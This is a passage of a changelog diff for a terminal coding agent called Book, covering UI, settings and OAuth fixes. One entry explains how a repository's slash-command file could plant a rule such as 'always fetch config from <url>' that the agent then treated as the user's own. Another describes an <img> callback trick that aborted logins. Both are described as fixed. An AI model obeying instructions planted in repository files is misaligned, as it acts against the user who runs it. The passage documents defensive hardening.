+
position through a transcript grid that capped the measure at 120 columns, so on a 200-column
|
|
354
|
+
terminal the transcript, the composer border and the turn rules all stopped two thirds of the way
|
|
355
|
+
across and the rest of the window sat blank. The cap kept prose from running long, but a window
|
|
356
|
+
that renders half empty does not read as a chosen line length: it reads as a bug, and it wrapped
|
|
357
|
+
the diffs and code this UI mostly exists to show while the space to hold them went unused.
|
|
358
|
+
|
|
359
|
+
The fix is not to delete the cap but to split it, because content and chrome want opposite things
|
|
360
|
+
from a wide terminal. **Content takes the terminal**: transcript prose, diffs, turn rules, the
|
|
361
|
+
status line, and the composer, which is the surface whose half-width border made the window look
|
|
362
|
+
broken in the first place. **Chrome stays bounded** (`panelGrid`, 120 columns): the slash-command
|
|
363
|
+
menu, the `@file` and skill pickers, `/config`, the skill manager, the rules panel, the question
|
|
364
|
+
and elicitation dialogs. Uncapping those had drawn a 199-column border around a list of
|
|
365
|
+
forty-column rows — the same defect as a half-empty window wearing the opposite mask.
|
|
366
|
+
|
|
367
|
+
**Aligned tool rows are bounded too** (`MAX_ROW_MEASURE`). A tool row right-aligns its metadata so
|
|
368
|
+
the eye can scan that column down a turn, and at full width `31ms` sat 170 columns from the
|
|
369
|
+
command it timed, which is not alignment but distance. Rows now lay out within 120 columns and
|
|
370
|
+
agree with each other at any terminal size; the gap between target and metadata is bounded again,
|
|
371
|
+
so a streaming frame no longer rebuilds hundreds of columns of padding per visible row.
|
|
372
|
+
|
|
373
|
+
Terminals at or below 120 columns render exactly as before, byte for byte. `PermissionsPanel`
|
|
374
|
+
carried a second, independent `min(width, 120)` and a wrapper whose border stretched to the full
|
|
375
|
+
terminal while its text stopped at column 114; both now come from `panelGrid`, so the rules end
|
|
376
|
+
where the box does.
|
|
377
|
+
|
|
378
|
+
- **`/config` stops answering the same question two ways.** The command was two products under one
|
|
379
|
+
name. Bare `/config` opened the settings menu, whose rows write the layer each setting belongs to
|
|
380
|
+
-- user-global for model, compact model, effort, permission default and the display toggles;
|
|
381
|
+
workspace-local for theme, skill overrides and per-profile agent models -- and take effect
|
|
382
|
+
immediately. `/config <key>=<value>` sent *everything* to `<workspace>/.book/settings.local.json`
|
|
383
|
+
and reported "(next session)". So the same setting had two homes and two moments depending on
|
|
384
|
+
which half of one command you used, and one screen could show both answers at once --
|
|
385
|
+
`/config theme=light` printed `Set theme = "light" ... (next session).` directly above a menu row
|
|
386
|
+
still reading `T Theme dark`. `book config set`, which had defaulted to the user layer for
|
|
387
|
+
exactly this reason, was a third opinion.
|
|
388
|
+
|
|
389
|
+
The typed form now runs the same guarded write as `book config set` -- user-global by default,
|
|
390
|
+
`--local` / `--project` / `-g` to name a layer, at most one of them -- and inherits the three
|
|
391
|
+
guards it never had. A key outside the schema (`/config maxTruns=12`) used to report success and
|
|
392
|
+
change nothing forever; so did a trust-owned key like `permissions.projectAllowRules`, which no
|
|
393
|
+
loader reads from a settings file at all. And a value that is valid alone but breaks the *merge*
|
|
394
|
+
is refused before it lands, rather than after, when every command that could remove it already
|
|
395
|
+
fails at load.
|
|
396
|
+
|
|
397
|
+
The eight settings a running session holds rather than re-reads -- `model`, `compactModel`,
|
|
398
|
+
`effort`, `theme`, `defaultMode`, `ui.showThinking`, `ui.startupAnimation`, `memory.autoSave` --
|
|
399
|
+
are handed to the effect the menu row and the dedicated command already use, so `/config model=x`
|
|
400
|
+
is `/model x`. Writing them to a file was the original lie: the session never re-reads it, so the
|
|
401
|
+
command reported a switch that had not happened. Each lands in the layer that setting belongs to,
|
|
402
|
+
which is why naming a scope now means something specific: asking for the layer a setting already
|
|
403
|
+
uses is the same request as asking for none and still takes the live path, while asking for a
|
|
404
|
+
different file gets a literal write and a reply saying the change waits for the next start.
|
|
405
|
+
`--global model=x` writing the same file as the bare form but skipping the live apply was the
|
|
406
|
+
divergence this entry exists to remove, reappearing inside the fix.
|
|
407
|
+
|
|
408
|
+
The write itself now lives in `src/settings-write.ts`, called by both surfaces, because two
|
|
409
|
+
copies of a layer policy is how they came to disagree in the first place. Two long-standing holes
|
|
410
|
+
in it are closed while it is one function: a write is now checked against every layer resolved
|
|
411
|
+
*after* it rather than only against the two below `user`, so `--project` no longer reports success
|
|
412
|
+
for a value the local layer still decides, and a `--settings` override that defines the key is
|
|
413
|
+
reported too, since it is merged last of all. The refusals for `experimental.*` and `auth.*` say
|
|
414
|
+
they apply in every scope instead of pointing the reader at `<BOOK_HOME>/settings.json` -- the
|
|
415
|
+
file the refused write was already aimed at, so following the message re-ran the same command.
|
|
416
|
+
|
|
417
|
+
- **A user-global preference stops losing to the stale local value it was meant to replace.**
|
|
418
|
+
`setModel` cleared any workspace-local override after writing the global layer, because the local
|
|
419
|
+
layer resolves last and would otherwise keep deciding the next session. The other six user-layer
|
|
420
|
+
writes -- compact model, effort, permission default, and the three display toggles -- did not, so
|
|
421
|
+
the setting moved in front of the user and moved back when they restarted, silently. That stale
|
|
422
|
+
local value is exactly what the previous `/config <key>=<value>` wrote, so the users most likely
|
|
423
|
+
to hit it are the ones who followed the README. All seven now go through one
|
|
424
|
+
`persistUserSettingClearingLocal`.
|
|
425
|
+
|
|
426
|
+
- **`/config` can be browsed.** It is the only place two settings can be reached at all -- compact
|
|
427
|
+
model and subagent profiles have no command of their own -- and it closed the moment you chose a
|
|
428
|
+
row, so browsing it was impossible and changing two settings meant opening it twice. Two of the
|
|
429
|
+
ten rows did come back, but only because `selectingCompactModel` and `agentProfileForModel`
|
|
430
|
+
happened to imply where the picker had been opened from; the other five picker rows had nothing
|
|
431
|
+
recording an origin, so `Esc` from them landed on the composer.
|
|
432
|
+
|
|
433
|
+
The origin is now recorded explicitly, so every picker returns to the menu on both cancel and
|
|
434
|
+
save -- and returns to *the row it was opened from*, since the menu unmounts while a picker is
|
|
435
|
+
open and would otherwise always remount on Model. The profile picker still wins over the menu
|
|
436
|
+
when a model is being chosen for a subagent, because it is the deeper surface and its own cancel
|
|
437
|
+
carries the user the rest of the way back. `/skills`' "use this skill" still ends at the
|
|
438
|
+
composer: it is putting text in the input bar, not browsing settings.
|
|
439
|
+
|
|
440
|
+
- **The composer stops telling you to answer a question nobody asked.** It read "Answer the prompt
|
|
441
|
+
above" whenever input was suppressed -- but that one flag covered two unrelated situations: a
|
|
442
|
+
permission prompt, plan approval, question or elicitation genuinely waiting on the user, and a
|
|
443
|
+
sheet such as `/config`, `/model` or the rules list merely holding the keyboard while it is open.
|
|
444
|
+
Only the first is a prompt. The two are now distinguished, and a sheet says what is true of every
|
|
445
|
+
sheet that suppresses input: Esc closes it. (#158)
|
|
446
|
+
|
|
447
|
+
- **A crash no longer reads as lost work, and no longer traps the user.** The TUI error boundary
|
|
448
|
+
said "Restart Book to recover" and nothing else, so a user whose render blew up mid-session could
|
|
449
|
+
not tell whether an hour of conversation was gone. It was never gone -- `SessionStore.create`
|
|
450
|
+
appends the session header synchronously at startup and every record after it lands the same way
|
|
451
|
+
-- so the box now names the command that reopens the session. It omits that line when persistence
|
|
452
|
+
is off, and when the session holds nothing but its own header, because reopening an empty
|
|
453
|
+
conversation is not the reassurance it sounds like.
|
|
454
|
+
|
|
455
|
+
The box also owns its own keyboard. It could not borrow the app's: that handler stays mounted
|
|
456
|
+
with whatever state it held when the render blew up, so it swallowed Ctrl+C behind its modal
|
|
457
|
+
guard whenever a picker was open and spent it on `interrupt()` whenever a turn was streaming --
|
|
458
|
+
and with Ink's `exitOnCtrlC` disabled and no SIGINT handler behind it, nothing else would have
|
|
459
|
+
exited either. Ctrl+C now leaves through the normal session-end path from any crash, and R
|
|
460
|
+
retries the render, which recovers the many throws that are transient rather than costing the
|
|
461
|
+
user the whole process.
|
|
462
|
+
|
|
463
|
+
The `console.warn` that printed the same message as raw text above the alternate screen is gone:
|
|
464
|
+
it duplicated the box and smeared the frame. Its diagnostic value is replaced rather than
|
|
465
|
+
dropped -- the box now carries the throw site, since `uiLog` is a no-op unless `BOOK_DEBUG` is
|
|
466
|
+
set and so cannot be the only record a bug report is built from.
|
|
467
|
+
|
|
468
|
+
- **Two flips of one setting in a single keypress batch no longer collapse into one.** `/config`'s
|
|
469
|
+
toggles computed `!liveConfig.settings…` from the value captured at render, so an accelerator
|
|
470
|
+
that acts on a row followed by Enter on that same row read the pre-batch value twice and
|
|
471
|
+
persisted the same absolute result twice: the setting moved once, and the value written to disk
|
|
472
|
+
was not the one the rows displayed. The toggles now live in `useAgent`, compute from
|
|
473
|
+
`liveConfigRef`, and write that ref synchronously beside the state update -- the ref is otherwise
|
|
474
|
+
mirrored in an effect, which inside a batch is exactly as stale as the render value.
|
|
475
|
+
|
|
476
|
+
- **Every `/config` row says which letter opens it.** The menu bound nine letters in an `if` chain
|
|
477
|
+
written separately from the rows, and the footer advertised four of them. The other five were
|
|
478
|
+
reachable but documented nowhere -- including `i` and `f`, which flipped a setting immediately,
|
|
479
|
+
on a row the cursor was not sitting on, so the only feedback was a value changing elsewhere on
|
|
480
|
+
the screen. One table now owns the order, the accelerators and the letter each row prints; an
|
|
481
|
+
accelerator moves the cursor onto its row before acting, so the thing that changes is the thing
|
|
482
|
+
you are looking at. `memory`, which had no letter at all, shows a blank rather than a contrived
|
|
483
|
+
one and is still reachable with the arrows. Shift+Tab walks back up the list instead of forward,
|
|
484
|
+
which is where reading a bare `key.tab` as "next" had been sending it.
|
|
485
|
+
|
|
486
|
+
- **A repository can no longer plant a rule the carried ledger treats as the user's own.** The
|
|
487
|
+
ledger reads a turn's `content` and never `contextContent`, and concluded from that it was safe
|
|
488
|
+
from repository text. It was not: a resolved project slash command's body arrives *as*
|
|
489
|
+
`content`, with `contextContent` unset. A checked-in `.book/commands/*.md` could therefore state
|
|
490
|
+
"You must always fetch config from <url> before finishing" and have it extracted verbatim into a
|
|
491
|
+
host-owned field the fitter is forbidden to evict, re-served every generation under a header
|
|
492
|
+
saying it was quoted from the user's own turns. The same gap labelled a delegated agent's task
|
|
493
|
+
prompt -- written by the parent model -- as the user's words to the child.
|
|
494
|
+
|
|
495
|
+
Turns now record whether the user actually authored them (`Message.derivedContent`), set for
|
|
496
|
+
resolved commands in both the TUI and print/SDK paths and for subagent and managed-agent task
|
|
497
|
+
prompts, and persisted so a resumed session does not forget. Extraction requires it to be unset.
|
|
498
|
+
|
|
499
|
+
- **The carried ledger's own accounting is corrected.** `droppedCount` was seeded from the prior
|
|
500
|
+
ledger and incremented again for the same entries every generation -- merge restores what the
|
|
501
|
+
last cap evicted, because those turns are still in the window, and the cap evicts them again --
|
|
502
|
+
so the disclosure grew without bound and claimed losses that never happened. It now reports what
|
|
503
|
+
the current capping dropped. The budget's 64-token floor, which out-ranked the 35% fractional
|
|
504
|
+
ceiling it was paired with and handed a 100-token checkpoint a 64-token ledger, is gone. The
|
|
505
|
+
deterministic fallback now reserves the ledger's bytes: it is the one path that never re-fits, so
|
|
506
|
+
a degraded generation came out larger than a healthy one. Capping no longer re-serializes the
|
|
507
|
+
whole ledger on every eviction.
|
|
508
|
+
|
|
509
|
+
- **Two rules the ledger quoted as verbatim were not.** The list-marker strip ran on every
|
|
510
|
+
sentence, so "3.11 is required for the build." was stored as "11 is required for the build." and
|
|
511
|
+
"-Wall must be passed" lost its flag. And supersession missed every contraction: the stopword set
|
|
512
|
+
held `don't` while the tokenizer produced `don` + `t`, so the polarity stem leaked into the topic
|
|
513
|
+
and "Don't use npm." was never superseded by "You must not use npm." -- leaving a redundant entry
|
|
514
|
+
outside the first eviction tier, where it displaced a genuinely distinct rule.
|
|
515
|
+
|
|
516
|
+
- **User constraints now survive compaction.** Book's own fidelity harness measured
|
|
517
|
+
`verbatimUserRetention` at **0.0**: both constraints a user opened the conversation with were gone
|
|
518
|
+
from the checkpoint after a single generation. They lived in model-authored episodes, and the
|
|
519
|
+
fitter evicts completed episodes oldest-first -- so the oldest thing in a coding session, the
|
|
520
|
+
brief, was the first thing dropped. A new host-owned **Carried Ledger**
|
|
521
|
+
(`src/agent/carried-ledger.ts`) splits authorship: directive sentences from the user's own turns
|
|
522
|
+
are extracted verbatim into a `carried` field on `ConversationCheckpointV2` that the reducer may
|
|
523
|
+
read but never write (a model-supplied `carried` is discarded) and that `fitCheckpoint` may not
|
|
524
|
+
evict. It grows monotonically and never reorders, so ledger position is chronology, and the
|
|
525
|
+
checkpoint message now states the reading rule: later entries win where two conflict. Because an
|
|
526
|
+
un-evictable field is just the overflow moved one level down, it carries its own cap -- 32
|
|
527
|
+
entries, 1024 tokens, at most 35% of the checkpoint budget, evicting superseded entries first,
|
|
528
|
+
then weak steers, then strong rules, never the newest, and disclosing anything dropped.
|
|
529
|
+
Extraction reads only what the user typed, never `@file` expansions or shell output, so nothing a
|
|
530
|
+
repository controls can plant a rule there, and text that looks like a secret is refused. Measured
|
|
531
|
+
over the same eight generations: `verbatimUserRetention` 0.0 -> 1.0, overall retention 0.333 ->
|
|
532
|
+
0.667, for no extra reducer calls. The design is written down in `plans/carried-ledger-plan.md`,
|
|
533
|
+
which previously existed only as references in code comments.
|
|
534
|
+
|
|
535
|
+
- **`book config set` now writes the user-global layer by default, so a setting follows you instead
|
|
536
|
+
of the directory you happened to be in.** It previously wrote `<workspace>/.book/settings.local.json`
|
|
537
|
+
unconditionally, with no way to ask for another layer: the same preference had to be re-set in
|
|
538
|
+
every checkout, and because the local layer resolves *last*, a stray value left in one silently
|
|
539
|
+
outranked a later deliberate one. `--project` and `--local` reach the two workspace layers,
|
|
540
|
+
`-g`/`--global` states the new default explicitly, and more than one scope is an error. A
|
|
541
|
+
user-global write that a workspace layer still shadows now reports it rather than looking inert.
|
|
542
|
+
|
|
543
|
+
- **TUI preferences are saved by whose choice they are.** Effort, compact model, thinking display,
|
|
544
|
+
startup animation, and memory auto-capture moved from the project-local layer to the user-global
|
|
545
|
+
one, joining model, provider registries, API keys, and the permission default mode. Skill
|
|
546
|
+
overrides, approved permission rules, per-profile agent models, and the theme stay project-local:
|
|
547
|
+
those are about the repository, and a theme name can come from a project's `.book/themes`, where
|
|
548
|
+
it would not resolve elsewhere.
|
|
549
|
+
|
|
550
|
+
- **`book config set`, the `/config` slash command, and the TUI's local persistence share one list
|
|
551
|
+
of settings a workspace file may not carry.** The `experimental.*` guard existed in all three;
|
|
552
|
+
the `auth.*` guard was added to only one, so `/config auth.profile=codex` wrote a value the
|
|
553
|
+
loader strips and reported success. Both now come from `blockedWorkspaceSettingPath`.
|
|
554
|
+
|
|
555
|
+
- **`book doctor` names the credential that will actually be used.** It reported
|
|
556
|
+
`Credentials: resolved` whenever an API key was present, which points at the wrong credential once
|
|
557
|
+
an auth profile is active - the transports replace the key headers outright. It now reports the
|
|
558
|
+
active profile, its account label, and its token expiry - through the same renderer
|
|
559
|
+
`book auth status` uses, so the two commands cannot disagree about whether a credential is still
|
|
560
|
+
good - or tells the user to run `book auth login <profile>` when the selected profile has nothing
|
|
561
|
+
stored. An unreadable credential store is reported as such rather than as "nothing is logged in",
|
|
562
|
+
which was a dead end: `book auth login` also refuses to write a store it cannot parse.
|
|
563
|
+
|
|
564
|
+
- **The 401 message names commands that exist.** It said "Check BOOK_API_KEY or run `/login`" -
|
|
565
|
+
`/login` was never a Book slash command, and BOOK_API_KEY is the wrong thing to look at once a
|
|
566
|
+
subscription profile is active.
|
|
567
|
+
|
|
568
|
+
### Added
|
|
569
|
+
|
|
570
|
+
- **`book status` reports whether a run is alive, and how it ended.** Book has been writing a
|
|
571
|
+
liveness record to `<BOOK_HOME>/runs/<session-id>.json` at every turn boundary -- pid, turn,
|
|
572
|
+
elapsed, spend against budget, current todo, last tool, free disk, and a terminal or crash outcome
|
|
573
|
+
-- and nothing outside its own test read it. `book status` reported objective, history, tokens,
|
|
574
|
+
cost, and todos from the session JSONL, and so could not answer whether the process was alive,
|
|
575
|
+
which turn it was on, or whether it finished cleanly. A 20-minute print run that completed its work
|
|
576
|
+
correctly and one that died at turn 16 on a stalled stream looked identical from outside; the only
|
|
577
|
+
way to tell them apart was `jq` on a file with no documented reader.
|
|
578
|
+
|
|
579
|
+
The record is now folded into `book status`, which already existed, needs no credentials, and is
|
|
580
|
+
the surface a person looks at. The headline is one of four: `running` when the pid answers,
|
|
581
|
+
`finished` with the terminal status and reason, `crashed` when the process died recording no
|
|
582
|
+
outcome, and -- the case the record exists for -- *no longer running, and recorded no outcome*. A
|
|
583
|
+
live process that has not reached a turn boundary in fifteen minutes is named as possibly wedged,
|
|
584
|
+
since a transcript's mtime advances at the same rate for a healthy run and one stuck on a
|
|
585
|
+
permission prompt. `--json` carries the same fields under `run`.
|
|
586
|
+
|
|
587
|
+
- **`book config unset <key>`** removes a key from one layer, so a shadowing value can be cleared
|
|
588
|
+
with the tool that reported it rather than by hand.
|
|
589
|
+
|
|
590
|
+
- **`book config get`/`list` take a scope.** Without one they still report the resolved merge;
|
|
591
|
+
with `--global`, `--project`, or `--local` they read that single file verbatim, which is what
|
|
592
|
+
answers "why is this not the value I set".
|
|
593
|
+
|
|
594
|
+
- **Subscription authentication (`book auth login | logout | status`).** Book can now authenticate
|
|
595
|
+
with a provider subscription over OAuth instead of an API key, through two built-in profiles:
|
|
596
|
+
`anthropic` (Anthropic transport) and `codex` (OpenAI-compatible transport). The flow is
|
|
597
|
+
authorization-code with PKCE (S256) and a CSRF `state`, against a listener bound to `127.0.0.1`
|
|
598
|
+
only that serves exactly one matching callback; a mismatched callback is refused and the flow
|
|
599
|
+
keeps waiting for the real one. `--manual` skips the listener entirely and takes the redirect URL
|
|
600
|
+
pasted back, which is the flow that works when the browser is on a different machine from the CLI.
|
|
601
|
+
|
|
602
|
+
**Book bundles no vendor client ids.** A client id identifies which application an authorization
|
|
603
|
+
server releases a subscription token to, so shipping a vendor's first-party id would make every
|
|
604
|
+
Book user appear to that vendor as that vendor's own official CLI. The id is configuration -
|
|
605
|
+
`BOOK_AUTH_CLIENT_ID_<PROFILE>` or `auth.profiles.<id>.clientId` - and `book auth login` stops
|
|
606
|
+
with both of those lines, before it opens a browser or binds a port, when none is set.
|
|
607
|
+
|
|
608
|
+
Tokens live in `<BOOK_HOME>/auth.json` at mode `0600`, never in a workspace: a repository can
|
|
609
|
+
force-add a tracked `.book/settings.local.json` into a clone, so nothing a repository controls may
|
|
610
|
+
reach an account credential. The `auth` settings block is held to the same rule and read only from
|
|
611
|
+
a trusted source - `<BOOK_HOME>/settings.json`, an explicit `--settings` file, or the environment.
|
|
612
|
+
Every field in it decides where an account-wide token is obtained or sent (`profiles.<id>.baseUrl`
|
|
613
|
+
is the host that receives the Authorization header on every request), so both workspace layers are
|
|
614
|
+
stripped and `book config set auth.…` refuses rather than writing where it would be ignored. Reads fail closed and writes refuse a store they could not parse,
|
|
615
|
+
rather than silently discarding a refresh token. Endpoints, scopes, redirect, base URL, default
|
|
616
|
+
model, and headers are all overridable per profile, and a wholly new profile needs only
|
|
617
|
+
`authorizeUrl`, `tokenUrl`, and `baseUrl` - enough to point Book at a self-hosted authorization
|
|
618
|
+
server without a fork.
|
|
619
|
+
|
|
620
|
+
**The credential is bound to its profile's origin**, enforced where the request header is built
|
|
621
|
+
rather than at each place a base URL can change. `BOOK_BASE_URL`, a `provider.<id>` entry, and a
|
|
622
|
+
legacy `.bookrc.json` can all retarget a request after the profile was selected - and
|
|
623
|
+
`.bookrc.json` is repository-controlled and covered by no settings trust layer - so guarding the
|
|
624
|
+
settings keys alone left the token reachable by a cloned repository. A mismatch is refused with a
|
|
625
|
+
message naming the override that caused it. Selecting a model through a configured
|
|
626
|
+
`provider/<id>` entry additionally drops the profile, since that entry brings its own endpoint
|
|
627
|
+
and key; such an entry no longer inherits the profile's endpoint either, which would have posted
|
|
628
|
+
the entry's own API key to the subscription vendor.
|
|
629
|
+
|
|
630
|
+
The login listener refuses any callback that cannot prove it belongs to the flow *before* it
|
|
631
|
+
honours an `error` parameter, so a bare `<img src=".../callback?error=x">` on a page the user
|
|
632
|
+
happens to visit can no longer kill a login in progress; reflected error text is HTML-escaped and
|
|
633
|
+
the page carries a `default-src 'none'` CSP. The redirect names `127.0.0.1` rather than
|
|
634
|
+
`localhost` (RFC 8252 §7.3), matching the address the listener actually binds. A shared token
|
|
635
|
+
refresh carries no caller's AbortSignal, so cancelling one turn no longer fails the parallel
|
|
636
|
+
subagents awaiting the same refresh; a refresh response that omits `expires_in` or `scope` keeps
|
|
637
|
+
the stored values rather than overwriting them with undefined, and `expires_in` is accepted as a
|
|
638
|
+
numeric string. Losing a cross-process refresh race re-reads the store and uses the token the
|
|
639
|
+
other process wrote instead of demanding a fresh login. Confidential clients
|
|
640
|
+
(`auth.profiles.<id>.clientSecret`, `BOOK_AUTH_CLIENT_SECRET_<PROFILE>`) are supported for
|
|
641
|
+
self-hosted authorization servers that issue no public clients.
|
|
642
|
+
|
|
643
|
+
Which credential a run spends is resolved once, at config load. An explicit `BOOK_AUTH_PROFILE` or
|
|
644
|
+
`auth.profile` wins (`api-key` pins the run to key auth); otherwise a stored credential is used
|
|
645
|
+
only when no API key resolved *and* exactly one credential matches the active provider - so adding
|
|
646
|
+
a login never silently retargets a workspace that already had a working key. An active profile
|
|
647
|
+
supplies the API base and a default model, and the transports send `Authorization: Bearer <token>`
|
|
648
|
+
*instead of* the API-key header rather than alongside it, which Anthropic rejects. Access tokens
|
|
649
|
+
refresh roughly two minutes before expiry, once per profile even across parallel subagents, and are
|
|
650
|
+
written back so concurrent `book` processes see them. With no profile active, both transports send
|
|
651
|
+
byte-identical headers to what they sent before.
|
|
652
|
+
|
|
653
|
+
### Fixed
|
|
654
|
+
|
|
655
|
+
- **The question wizard answers the question you are looking at, and only that one.** The batch
|
|
656
|
+
fix below made the wizard's cursor and question index safe against two keys arriving in one
|
|
657
|
+
stdin chunk, but the helpers those handlers called still looked the question up during render.
|
|
658
|
+
So back plus Enter, delivered together, recorded the answer against the question the user had
|
|
659
|
+
just left. Fixing that exposed a second owner of the Enter key: the custom-answer editor
|
|
660
|
+
submitted through its text input *and* the wizard's own handler saw the same keypress, and once
|
|
661
|
+
the mode flag was batch-safe the second listener read it already flipped and answered the next
|
|
662
|
+
question with its first option before it was ever shown. A pasted Enter, Down, Enter did the
|
|
663
|
+
same through the still-mounted text input, re-submitting the typed text against whichever
|
|
664
|
+
question the index had reached. The wizard now owns Enter in the editor outright, and every
|
|
665
|
+
helper resolves the question from its index rather than from render state.
|
|
666
|
+
|
|
667
|
+
Three smaller defects went with it. A custom answer that spelled an option's label was sent
|
|
668
|
+
beside the toggled label, which the host rejects as a duplicate and drops every answer in the
|
|
669
|
+
request; it now selects the option instead. A question the model happened to call
|
|
670
|
+
`constructor` read an inherited function where an array was expected and wedged the session in
|
|
671
|
+
the error screen; answers are keyed by question index now. And quick-choose accepted anything
|
|
672
|
+
`Number()` would coerce, so a pasted line beginning `" 1"` chose option 1.
|
|
673
|
+
|
|
674
|
+
#167 called the BYOK wizard's version of this latent. It was not: Space, Down, Enter in one
|
|
675
|
+
chunk deselected the last model and still passed the "select at least one" guard, persisting a
|
|
676
|
+
provider whose only model id was empty; arrow plus Enter on the source step discovered models
|
|
677
|
+
from an endpoint the user had just said has no model list; a filter character batched with
|
|
678
|
+
Down and Space toggled a model the filter then hid; and two arrows on the protocol step toggled
|
|
679
|
+
it once. Every value that wizard's handler reads back is batch-safe now, except the step itself,
|
|
680
|
+
which has to stay plain so a text field's Enter is not dispatched twice — the same reason the
|
|
681
|
+
elicitation form keeps its editing flag plain.
|
|
682
|
+
|
|
683
|
+
- **A clock correction no longer breaks a run's timeouts in both directions.** Every duration Book
|
|
684
|
+
decided — how long to keep retrying a failing provider, how long to wait for a background shell
|
|
685
|
+
to start or stop, how long to let the evidence ledger flush, how long the run has been going as
|
|
686
|
+
the model is told it — was measured by subtracting two readings of `Date.now()`. That is the
|
|
687
|
+
settable wall clock. NTP steps it, a resumed VM corrects it, an operator fixes a drifted host,
|
|
688
|
+
and none of that matters over a five-minute chat.
|
|
689
|
+
|
|
690
|
+
Over the multi-day runs Book is built for it matters twice, in opposite directions. A backwards
|
|
691
|
+
correction makes elapsed time *negative*, so a retry budget can never be exhausted and a provider
|
|
692
|
+
outage becomes an unbounded retry storm — measured at 51 attempts against a budget that allowed
|
|
693
|
+
well under ten. A forwards correction exhausts the same budget instantly, abandoning a call that
|
|
694
|
+
was about to succeed. Both are now measured against a monotonic clock (`src/clock.ts`), which no
|
|
695
|
+
adjustment can move.
|
|
696
|
+
|
|
697
|
+
**Timestamps are unchanged, deliberately.** Anything written to a file, shown on screen, or
|
|
698
|
+
compared against a stamp another process wrote is still wall-clock — including `Retry-After`,
|
|
699
|
+
which is an HTTP date and could not be anything else. Cross-process liveness stays there too, and
|
|
700
|
+
not by oversight: two processes share no monotonic origin, so a monotonic reading cannot cross
|
|
701
|
+
that boundary at all. `MILESTONES.md` records what that leaves open and what would actually fix
|
|
702
|
+
it, and each such call site now says so where it reads the clock.
|
|
703
|
+
|
|
704
|
+
- **Two dialogs now name the keys they actually accept.** `/model` binds six Alt-chords and
|
|
705
|
+
described them with four hand-written sentences picked by two booleans, which left holes.
|
|
706
|
+
`Alt+E` — set a model's effort — was advertised nowhere in the TUI at all: the row it opens
|
|
707
|
+
(`Effort [high] ← → adjust`) only appears once you have already guessed the key. And `Alt+S`,
|
|
708
|
+
use for this session, vanished whenever a removable BYOK provider existed, because that sentence
|
|
709
|
+
spent its line on `Alt+A` and `Alt+D` instead — the chord that always works was hidden by the
|
|
710
|
+
presence of one that sometimes does. The footer is now built from what is live, so a chord
|
|
711
|
+
cannot be advertised when it will not fire, or dropped because a different one appeared.
|
|
712
|
+
|
|
713
|
+
`/skills` listed eight chords on one line that did not fit, so Ink wrapped it — and the wrap
|
|
714
|
+
landed after a separator, leaving `Esc close` alone on a second line under a dangling `·`. Both
|
|
715
|
+
footers are now split deliberately, by what the keys act on.
|
|
716
|
+
|
|
717
|
+
- **`/resume` can reach every conversation, page, and be typed at.** It drew twelve rows while
|
|
718
|
+
its cursor wrapped over every session in the workspace, so in a workspace with more than twelve
|
|
719
|
+
the thirteenth arrow press moved the highlight onto a row that was not on screen — the list
|
|
720
|
+
showed no selection at all, and Enter resumed a conversation the user had never seen. It
|
|
721
|
+
windows now, pages with PgUp/PgDn, and filters as you type; it is the one list long enough to
|
|
722
|
+
need all three.
|
|
723
|
+
|
|
724
|
+
That fix came out of extracting the list dialog six pickers were each rebuilding — theme,
|
|
725
|
+
permission mode, effort, resume, subagent profiles and login. Along with the cut list, the copies
|
|
726
|
+
had drifted in two smaller ways: `/login` still marked its selection with `❯` after the rest of
|
|
727
|
+
the TUI had settled on `›`, and Esc was described four different ways depending on which dialog
|
|
728
|
+
was open. Paging is new to all six. The shared cursor is also batch-safe by construction, so a
|
|
729
|
+
picker cannot reacquire the defect fixed below by being written next.
|
|
730
|
+
|
|
731
|
+
`/model`, `/skills` and `/rewind` deliberately keep their own implementations — filtering with a
|
|
732
|
+
removal mode, search with multi-action rows, and a two-stage flow that has to complete from a
|
|
733
|
+
single input chunk.
|
|
734
|
+
|
|
735
|
+
- **A trust gate no longer confirms the button you moved off.** Ink hands a whole chunk of stdin
|
|
736
|
+
to its handlers in one go, and React batches every state update made while that runs — so two
|
|
737
|
+
keys that arrive together (a paste, an arrow repeating faster than a frame, input buffered over
|
|
738
|
+
a slow link) reached a handler that read its cursor back from render state and still saw the row
|
|
739
|
+
before the first key. The plan approval card approved a plan aimed at reject, and the MCP server
|
|
740
|
+
prompt connected a server aimed at reject. Both persist their answer, and both exist precisely
|
|
741
|
+
so the choice is deliberate.
|
|
742
|
+
|
|
743
|
+
Five more surfaces had the same read-back: the skill manager wrote activation and consent to the
|
|
744
|
+
wrong skill, the question wizard answered with the wrong option, the elicitation form sent itself
|
|
745
|
+
when an arrow left the send row, the effort picker saved the wrong level, and the BYOK wizard
|
|
746
|
+
toggled the wrong model. All of them now read the cursor through the batch-safe hook the pickers
|
|
747
|
+
already use. The effort picker is worth naming separately: it wrote its ref inside a state
|
|
748
|
+
updater, which looks safe and is not, because React evaluates only the *first* update in a batch
|
|
749
|
+
eagerly — so it went wrong from the second key onward while a one-key test passed.
|
|
750
|
+
|
|
751
|
+
- **The armed permission button is marked, and one glyph means "selected" everywhere.** The
|
|
752
|
+
permission card carried its armed choice in background colour and bold alone — the only
|
|
753
|
+
selection surface in the TUI without a glyph, while every menu, picker and wizard has one. A
|
|
754
|
+
low-contrast theme or a colour-blind reader had nothing left to read, and the gap widened when
|
|
755
|
+
`A` became the key that *arms* "Always allow" and then steps its scope rather than firing it:
|
|
756
|
+
the whole interaction now depends on seeing which button is armed. It uses the same `▸` the plan
|
|
757
|
+
approval card uses, and drops its brackets — a marker and a pair of brackets are two containers
|
|
758
|
+
doing one job, and the columns go to the rule pattern instead. Elsewhere, three components spelled
|
|
759
|
+
the selection marker `❯` while nineteen spelled it `›`; they all say `›` now, including the two
|
|
760
|
+
text-input carets, which matches the composer's own prompt.
|
|
761
|
+
|
|
762
|
+
The shortcut reference also said Esc only cancels a permission or aborts the stream. It closes
|
|
763
|
+
the open panel too.
|
|
764
|
+
|
|
765
|
+
- **A command in the `/` menu says what it does before how it is spelled.** Three things competed
|
|
766
|
+
for one line. The argument syntax sat between the name and the description, so at 80 columns
|
|
767
|
+
`/agent` read ``/agent <id>|send <id> <message>|stop <id> [Built-in] — Inspec…`` — the grammar of
|
|
768
|
+
the command in full, and then its meaning truncated away. `[Built-in]` repeated down every row of
|
|
769
|
+
a list that was entirely built-ins. And the whole row was one colour, so a name did not stand out
|
|
770
|
+
from its own description. Now the description always follows the name, the syntax appears only on
|
|
771
|
+
the selected row (the list is for finding a command; the syntax matters once you have found it),
|
|
772
|
+
the badge appears only when the list actually mixes categories, and the name, syntax, badge and
|
|
773
|
+
description each carry their own colour. The syntax is dropped rather than allowed to starve the
|
